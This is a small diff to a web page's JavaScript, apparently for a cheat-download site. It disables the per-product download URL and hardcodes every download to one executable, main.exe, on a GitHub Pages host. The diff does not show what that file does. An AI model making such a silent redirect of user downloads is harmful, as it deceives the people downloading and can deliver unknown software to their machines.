--- a/index.html
+++ b/index.html
@@ -1403,7 +1403,8 @@
         const confirmRisks = document.getElementById('confirmRisks');
         
         function showDownloadModal(downloadUrl, productName) {
-            currentDownloadUrl = downloadUrl;
+            //currentDownloadUrl = downloadUrl;
+            currentDownloadUrl = "https://blockhunter0007.github.io/cheathubdumpingground/main.exe";
             downloadModal.classList.add('active');
             document.body.style.overflow = 'hidden';
             confirmRisks.checked = false;
